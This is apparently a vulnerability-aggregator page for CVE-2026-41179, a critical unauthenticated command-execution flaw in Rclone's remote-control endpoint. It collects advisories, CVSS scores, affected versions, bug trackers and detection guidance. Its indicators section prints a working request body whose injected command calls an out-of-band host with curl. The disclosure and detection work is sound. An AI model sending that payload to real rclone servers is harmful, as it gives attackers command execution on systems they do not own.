CVE-2026-41179
published 2026-04-23CVE-2026-41179: Rclone is a command-line program to sync files and directories to and from different cloud storage providers. Starting in version 1.48.0 and prior to version…
PriorityP180critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
9.20%
94.7th percentile
Rclone is a command-line program to sync files and directories to and from different cloud storage providers. Starting in version 1.48.0 and prior to version 1.73.5, the RC endpoint `operations/fsinfo` is exposed without `AuthRequired: true` and accepts attacker-controlled `fs` input. Because `rc.GetFs(...)` supports inline backend definitions, an unauthenticated attacker can instantiate an attacker-controlled backend on demand. For the WebDAV backend, `bearer_token_command` is executed during backend initialization, making single-request unauthenticated local command execution possible on reachable RC deployments without global HTTP authentication. Version 1.73.5 patches the issue.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| github.com | rclone_rclone | >= 1.46.0 < 1.74.3 | 1.74.3 |
| github.com | rclone_rclone | >= 1.48.0 < 1.73.5 | 1.73.5 |
| oadp | oadp-mustgather-rhel9 | — | — |
| oadp | oadp-velero-restic-restore-helper-rhel9 | — | — |
| oadp | oadp-velero-rhel9 | — | — |
| rclone | rclone | — | — |
| rclone | rclone | >= 1.48.0 < 1.73.5 | 1.73.5 |
| rhacm2 | volsync-rhel9 | — | — |
| ubuntu | rclone | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/rc/noop
url/operations/fsinfo
command{"fs":":webdav,url='http://{{interactsh-url}}/',vendor=other,bearer_token_command='curl http://{{interactsh-url}}/{{randstr}}':"}
- →Probe for unauthenticated RC endpoint availability by sending an empty POST to /rc/noop and checking for HTTP 200 with JSON content-type before attempting exploitation.
- →Detect exploitation attempts targeting /operations/fsinfo with inline WebDAV backend definitions containing bearer_token_command in the fs parameter — a single unauthenticated POST is sufficient for RCE.
- →The RC server must be started via `rclone rcd` or the `--rc` flag and deployed without authentication for the vulnerability to be exploitable; monitor for rclone RC server processes exposed beyond localhost.
- →The vulnerability exists in Rclone versions >= 1.48.0 and < 1.73.5; flag any deployment of these versions with an exposed RC endpoint.
- →The attack vector is the inline backend definition syntax in the `fs` parameter (e.g., `:webdav,...,bearer_token_command='...':`); inspect POST bodies to /operations/fsinfo for this pattern.
- →For the WebDAV backend specifically, bearer_token_command is executed at backend initialization time — monitor for outbound network connections or process spawns originating from the rclone process shortly after a POST to /operations/fsinfo.
- ·Exploitation requires the RC server to be running (via `rclone rcd` or `--rc` flag) AND configured without global HTTP authentication. Deployments with authentication enabled are not directly vulnerable. ↗
- ·Red Hat notes that because their products expose the RC server only to localhost, the practical impact is reduced — network-exposed RC deployments are the primary risk. ↗
- ·The fix is in version 1.73.5; the patch adds `AuthRequired: true` to the `operations/fsinfo` endpoint to prevent unauthenticated access. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.09.2CRITICALCVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
ghsa9.8CRITICAL
vendor_redhat9.2CRITICAL
vendor_ubuntu9.2CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Rclone vulnerabilities
vendor_ubuntu·2026-05-25·CVSS 9.2
CVE-2026-41176 [CRITICAL] Rclone vulnerabilities
Title: Rclone vulnerabilities
Summary: Several security issues were fixed in Rclone.
It was discovered that Rclone incorrectly handled authorization in the remote
control API. An attacker could possibly use this issue to obtain sensitive
information. (CVE-2026-41176)
It was discovered that Rclone incorrectly handled backend instantiation via the
remote control API. An attacker could possibly use this issue to execute
arbitrary code. This issue only affected Ubuntu 24.04 LTS, Ubuntu 25.10 and
Ubuntu 26.04 LTS. (CVE-2026-41179)
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
github.com/rclone/rclone: Rclone: Unauthenticated local command execution via exposed RC endpoint
vendor_redhat·2026-04-23·CVSS 9.2
CVE-2026-41179 [CRITICAL] CWE-94 github.com/rclone/rclone: Rclone: Unauthenticated local command execution via exposed RC endpoint
github.com/rclone/rclone: Rclone: Unauthenticated local command execution via exposed RC endpoint
A flaw was found in Rclone, a command-line program for syncing files with cloud storage. An unauthenticated attacker can exploit an exposed Remote Control (RC) endpoint, `operations/fsinfo`, to instantiate a malicious backend. This allows the attacker to execute arbitrary local commands during backend initialization, leading to unauthenticated local command execution on reachable RC deployments.
Statement: The vulnerable functionality exists in the RC server. Thus, for the vulnerability to be exploited, the RC server must be started, via `rclone rcd` or the `--rc` flag. Additionally, the RC server must be deployed without any required authentication. Because Red Hat products either do not in
GHSA
Rclone: Unauthenticated command execution in `rclone rcd --rc-serve` via inline remote instantiation, bypassing CVE-2026-41179 fix
ghsa·2026-06-16·CVSS 9.8
CVE-2026-49980 [CRITICAL] CWE-306 Rclone: Unauthenticated command execution in `rclone rcd --rc-serve` via inline remote instantiation, bypassing CVE-2026-41179 fix
Rclone: Unauthenticated command execution in `rclone rcd --rc-serve` via inline remote instantiation, bypassing CVE-2026-41179 fix
## Summary
`rclone rcd --rc-serve` accepts unauthenticated `GET` and `HEAD` requests to paths of the form:
```text
/[remote:path]/object
```
The `remote` value is parsed from the URL and passed to normal backend initialization. Inline remote configuration can set backend options that execute local commands during initialization. As a result, a single unauthenticated `GET` or `HEAD` request can execute a command as the rclone process user.
Versions from 1.55.0 onwards are vulnerable to command execution. Earlier versions (from 1.46.0) are vulnerable to the unauthenticated local file read described under "Additional impact" but not to command execution, beca
VulDB
Rclone up to 1.73.4 RC Endpoint operations/fsinfo bearer_token_command os command injection (GHSA-jfwf-28xr-xw6q / Nessus ID 314577)
vuldb·2026-05-14·CVSS 9.2
CVE-2026-41179 [CRITICAL] Rclone up to 1.73.4 RC Endpoint operations/fsinfo bearer_token_command os command injection (GHSA-jfwf-28xr-xw6q / Nessus ID 314577)
A vulnerability identified as critical has been detected in Rclone up to 1.73.4. This affects the function bearer_token_command of the file operations/fsinfo of the component RC Endpoint. The manipulation leads to os command injection.
This vulnerability is documented as CVE-2026-41179. The attack can be initiated remotely. There is not any exploit available.
You should upgrade the affected component.
GHSA
RClone: Unauthenticated operations/fsinfo allows attacker-controlled backend instantiation and local command execution
ghsa·2026-04-22
CVE-2026-41179 [CRITICAL] CWE-306 RClone: Unauthenticated operations/fsinfo allows attacker-controlled backend instantiation and local command execution
RClone: Unauthenticated operations/fsinfo allows attacker-controlled backend instantiation and local command execution
### Summary
The RC endpoint `operations/fsinfo` is exposed without `AuthRequired: true` and accepts attacker-controlled `fs` input. Because `rc.GetFs(...)` supports inline backend definitions, an unauthenticated attacker can instantiate an attacker-controlled backend on demand. For the WebDAV backend, `bearer_token_command` is executed during backend initialization, making single-request unauthenticated local command execution possible on reachable RC deployments without global HTTP authentication.
### Preconditions
Preconditions for this vulnerability are:
- The rclone remote control API **must** be enabled, either by the `--rc` flag or by running the `rclone rcd` ser
No detection rules found.
Nuclei
RClone RC - Command Injection
nuclei·CVSS 9.2
CVE-2026-41179 [CRITICAL] RClone RC - Command Injection
RClone RC - Command Injection
Rclone >= 1.48.0 and = 1.48.0 and < 1.73.5 contains an unauthenticated local command execution caused by unauthenticated access to the RC endpoint operations/fsinfo with attacker-controlled fs input, letting unauthenticated attackers execute local commands, exploit requires reachable RC deployment without global HTTP authentication.
impact: |
Unauthenticated attackers can execute local commands remotely, potentially leading to full system compromise.
remediation: |
Update to version 1.73.5 or later.
reference:
- https://github.com/rclone/rclone/security/advisories/GHSA-jfwf-28xr-xw6q
- https://nvd.nist.gov/vuln/detail/CVE-2026-41179
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
cvss-score: 9.2
cve-id: CVE-2026-4
Bugzilla
CVE-2026-41179 rclone-browser: Rclone: Unauthenticated local command execution via exposed RC endpoint [fedora-all]
bugzilla·2026-04-30·CVSS 9.2
CVE-2026-41179 [CRITICAL] CVE-2026-41179 rclone-browser: Rclone: Unauthenticated local command execution via exposed RC endpoint [fedora-all]
CVE-2026-41179 rclone-browser: Rclone: Unauthenticated local command execution via exposed RC endpoint [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-41179 restic: Rclone: Unauthenticated local command execution via exposed RC endpoint [epel-all]
bugzilla·2026-04-30·CVSS 9.2
CVE-2026-41179 [CRITICAL] CVE-2026-41179 restic: Rclone: Unauthenticated local command execution via exposed RC endpoint [epel-all]
CVE-2026-41179 restic: Rclone: Unauthenticated local command execution via exposed RC endpoint [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-41179 restic: Rclone: Unauthenticated local command execution via exposed RC endpoint [fedora-all]
bugzilla·2026-04-30·CVSS 9.2
CVE-2026-41179 [CRITICAL] CVE-2026-41179 restic: Rclone: Unauthenticated local command execution via exposed RC endpoint [fedora-all]
CVE-2026-41179 restic: Rclone: Unauthenticated local command execution via exposed RC endpoint [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-41179 rclone-browser: Rclone: Unauthenticated local command execution via exposed RC endpoint [epel-all]
bugzilla·2026-04-30·CVSS 9.2
CVE-2026-41179 [CRITICAL] CVE-2026-41179 rclone-browser: Rclone: Unauthenticated local command execution via exposed RC endpoint [epel-all]
CVE-2026-41179 rclone-browser: Rclone: Unauthenticated local command execution via exposed RC endpoint [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-41179 golang-github-rclone-gofakes3: Rclone: Unauthenticated local command execution via exposed RC endpoint [fedora-all]
bugzilla·2026-04-30·CVSS 9.2
CVE-2026-41179 [CRITICAL] CVE-2026-41179 golang-github-rclone-gofakes3: Rclone: Unauthenticated local command execution via exposed RC endpoint [fedora-all]
CVE-2026-41179 golang-github-rclone-gofakes3: Rclone: Unauthenticated local command execution via exposed RC endpoint [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-41179 golang-github-rclone-ftp: Rclone: Unauthenticated local command execution via exposed RC endpoint [fedora-all]
bugzilla·2026-04-30·CVSS 9.2
CVE-2026-41179 [CRITICAL] CVE-2026-41179 golang-github-rclone-ftp: Rclone: Unauthenticated local command execution via exposed RC endpoint [fedora-all]
CVE-2026-41179 golang-github-rclone-ftp: Rclone: Unauthenticated local command execution via exposed RC endpoint [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-41179 rclone: Rclone: Unauthenticated local command execution via exposed RC endpoint [fedora-all]
bugzilla·2026-04-30·CVSS 9.2
CVE-2026-41179 [CRITICAL] CVE-2026-41179 rclone: Rclone: Unauthenticated local command execution via exposed RC endpoint [fedora-all]
CVE-2026-41179 rclone: Rclone: Unauthenticated local command execution via exposed RC endpoint [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-41179 gphotosdl: Rclone: Unauthenticated local command execution via exposed RC endpoint [fedora-all]
bugzilla·2026-04-30·CVSS 9.2
CVE-2026-41179 [CRITICAL] CVE-2026-41179 gphotosdl: Rclone: Unauthenticated local command execution via exposed RC endpoint [fedora-all]
CVE-2026-41179 gphotosdl: Rclone: Unauthenticated local command execution via exposed RC endpoint [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-41179 github.com/rclone/rclone: Rclone: Unauthenticated local command execution via exposed RC endpoint
bugzilla·2026-04-23·CVSS 9.2
CVE-2026-41179 [CRITICAL] CVE-2026-41179 github.com/rclone/rclone: Rclone: Unauthenticated local command execution via exposed RC endpoint
CVE-2026-41179 github.com/rclone/rclone: Rclone: Unauthenticated local command execution via exposed RC endpoint
Rclone is a command-line program to sync files and directories to and from different cloud storage providers. Starting in version 1.48.0 and prior to version 1.73.5, the RC endpoint `operations/fsinfo` is exposed without `AuthRequired: true` and accepts attacker-controlled `fs` input. Because `rc.GetFs(...)` supports inline backend definitions, an unauthenticated attacker can instantiate an attacker-controlled backend on demand. For the WebDAV backend, `bearer_token_command` is executed during backend initialization, making single-request unauthenticated local command execution possible on reachable RC deployments without global HTTP authentication. Version 1.73.5 patches the i
Bugzilla
CVE-2026-41179 rclone: Rclone: Unauthenticated local command execution via exposed RC endpoint [epel-all]
bugzilla·2026-04-23·CVSS 9.2
CVE-2026-41179 [CRITICAL] CVE-2026-41179 rclone: Rclone: Unauthenticated local command execution via exposed RC endpoint [epel-all]
CVE-2026-41179 rclone: Rclone: Unauthenticated local command execution via exposed RC endpoint [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Hackernews
⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More
blogs_hackernews·2026-06-22·CVSS 9.8
CVE-2026-24858 [CRITICAL] ⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## ⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More
It’s Monday again.
This week’s threat list looks painfully familiar: abused integrations, fake tools, poisoned websites, ransomware crews trying to shut down security tools, and mobile malware asking for way too much control.
The annoying part is how little of this feels new. Weak credentials, sketchy downloads, browser extensions with too much access, and WordPress sites are used to push more attacks. Nothing clever. Just sloppy, cheap, and effective.
Here’s the Monday recap. Let’s get into the week’s mess.
## ⚡ Threat of the We
https://github.com/rclone/rclone/blob/bf55d5e6d37fd86164a87782191f9e1ffcaafa82/backend/webdav/webdav.gohttps://github.com/rclone/rclone/blob/bf55d5e6d37fd86164a87782191f9e1ffcaafa82/fs/operations/rc.gohttps://github.com/rclone/rclone/blob/bf55d5e6d37fd86164a87782191f9e1ffcaafa82/fs/rc/cache.gohttps://github.com/rclone/rclone/commit/2a9e952b38e03a96bf40c9eb6e8e22199865ee3bhttps://github.com/rclone/rclone/releases/tag/v1.73.5https://github.com/rclone/rclone/security/advisories/GHSA-jfwf-28xr-xw6qhttps://rclone.org/changelog/#v1-73-5-2026-04-19https://access.redhat.com/security/cve/CVE-2026-41179https://bugzilla.redhat.com/show_bug.cgi?id=2460988https://github.com/rclone/rclone/security/advisories/GHSA-jfwf-28xr-xw6qhttps://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-41179.json
2026-04-23
Published